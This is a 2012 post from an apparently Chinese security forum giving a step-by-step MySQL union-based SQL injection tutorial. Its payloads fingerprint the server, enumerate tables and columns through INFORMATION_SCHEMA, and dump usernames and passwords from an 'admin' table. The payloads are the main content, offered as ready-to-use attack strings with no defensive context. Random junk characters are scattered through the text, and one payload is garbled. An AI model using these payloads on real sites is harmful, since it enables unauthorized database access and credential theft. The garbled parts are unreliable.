找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1901|回复: 0
打印 上一主题 下一主题

mysql常规注入

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:48:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本文介绍MYSQL盲注的一些语句和方法
9 T# |; Q7 f: R0 h( Y
0 B; K6 Z0 _  k: n学习盲注前先了解下 IFORMATION_SCHEMA 库
" J2 O0 G) [4 f4 L. O* T2 m* [% _% H6 q! @- O
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
) a& m. U$ X7 r2 h存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。* L% n# G$ {2 e& [$ H6 w! Q
1.得到所有数据库名:
/ k: |4 d; {; T: G3 J3 \: k" s|SCHEMATA ->存储数据库名的表8 x" u: B2 A1 n2 A1 N
|---字段:SCHEMA_NAME ->数据库名称
1 P1 s% L# v* y% P' G
7 J' m" S' E; p9 X# f( i' ?2 O( }|TABLES ->存储表名6 o5 h# Q, T# L
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名5 x) Z( \  B% G7 ], b
|---字段:TABLE_NAME ->存储表的表名4 @3 r/ a2 I/ g6 \# S
/ ?& d) ?3 P4 }$ [0 ?: f
|COLUMNS ->存储的字段名表
2 _( H0 F7 T$ e3 \+ Z$ M- g|---字段:TABLE_SCHEMA ->该字段所属数据库名( Y/ _. |3 N2 N5 ^
|---字段:TABLE_NAME ->存储所属表的名称
7 X6 @9 k9 A+ Z( F" Y  o; ]& N
! |* W4 U  F/ O5 o|---字段:COLUMN_NAME ->该字段的名称; Z' R8 n" W+ z
5 B# M8 Z/ E. m' L  g# b

, C6 S* c" E0 j/ z( X) Z
, Q" R1 N5 }8 R###########################################################################- t. z( i& h! P

% I) w( R, p3 s: ?! X  C' f0x001 获取系统信息:
( Z! O, F$ f% G0 u4 B7 k1 m2 x: s: \- ^0 m* }
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
% F2 t. b" c* ~5 L, T
8 S9 I7 r8 X# P( J  ^/*
+ L$ b$ {& n5 I, t# W9 T: \+ B; x' C0 {$ x: s  }
@@global.version_compile_os 获取系统版本; c3 b% ]. B1 b
. p4 x: ^2 E8 F! x* S; \6 a
@@datadir 数据库路径
0 {3 T' z2 i+ j) k; T2 z3 g+ [database() 当前数据库名称+ {4 w5 V5 a0 k! F; _. e
0x3c62723e 换行HEX值; N& @3 K9 a3 [  f& P. y% |

. ?! r' E8 c& ~2 F& f+ |*/) l* i. r# F) ~! U& I1 |

, z  G, J0 p; d# Y7 Y* f " w, d  Z2 X+ z' B. Y) K
# Z- m8 g6 G, ?, c* E/ J
######################################################################
# v3 u. V6 m# @. w+ C3 Y. K& l1 k' O) n
0x002 获取表名
7 U7 C, k# z" X8 C
4 n  g5 E% o- k1 V4 ^/ A- nunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
- v9 c6 _; b  Q7 V
, n7 n/ K9 B: c5 U + x- `: ?: e; F* h
" @* a5 U* k4 ?
/*: V' k/ y8 G% H2 e
& T. G- @. A& D: R- j& P% ]3 R1 [1 s
0x67617264656e 为当前数据库名
1 Q9 Q; ^/ T% l" v/ @& i/ E
$ e! [# G6 r3 _$ a: `' s: |* a! mgroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名+ G# M3 G* |8 @: g, |5 o) s

% Y% }$ k0 ^+ }% p; u$ N$ Z) M*/& o/ n9 e$ X* E( y( \

, H# s. ~  X0 u& x; Z8 T0 h6 _######################################################################
  L) H$ i% {* ~+ A2 r$ g& s8 a; G) @8 L
, I0 z% h* ], N& L' c" A

+ t+ U" z- N% S0x003 获取字段
! s$ t* G4 P/ z+ Q3 O0 Z, w6 h
, J* y3 n2 f2 l' p+ X. N' ^0 R* ?union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
2 o  Y. H* e% J- V
( x% O0 _* \% G$ f7 _' ]/*
% K  _& e( Y0 c1 j" `* v) u& P
! S" ~' i8 e. bgroup_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
9 x- f9 j) _* ^  _3 A, ]
1 b8 C6 R* [5 S, `8 R0x61646d696e ->选择一个表
3 F# M& S& J# W! e( e2 ~8 d5 f' [2 b" H+ Y( {9 L
0x67617264656e ->数据库名
5 M4 c% F% C; G$ x
% }- H: U+ Z3 b1 \$ m0 x( y9 ?- A, J5 x9 R*/+ V! E" Z+ \- C* j  @

- v. p2 H0 j; ]: ?7 k8 f- p#####################################################################* d  L2 G2 A9 J) A
5 O% |( }7 ~1 I/ i# d; x9 v+ v

+ f5 D6 }, M: o  Q! l0 t2 \7 w2 l0 @% X
0x004 获取数据& a% p% M& \, d1 |" A  \2 o

/ E0 n0 d) c1 M% m" }+ K+ dunion select 1,2,3( U! ~" I! U; h& ]4 }
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
9 U! u; k' Y+ i; W/ \5 @9 w. W
7 _5 r8 \: _$ n3 L' i3 p3 t- d, Eunion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin9 ]1 P9 a3 K4 b

  j' U$ g: ^0 w % ?( O  ?! V5 }" D1 U
' C3 U( {/ p3 d0 h9 g1 ?, K
/*5 C# c/ u! V- H5 B& ^5 S
( p! {  x) D  F: m
0x3c62723e 换行符号HEX编码( R0 g) ~! H( L3 ?  W; S
! I% e. S) |; E# j
group_concat 同时获得该字段所有数据8 p1 x0 T- C; h6 O7 i

$ [7 k- i* k2 r* u! D" }/ r( b*/! F$ B, s0 J8 F: }. W

6 g; z; n0 w1 O5 D4 _0 T2 D5 {
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表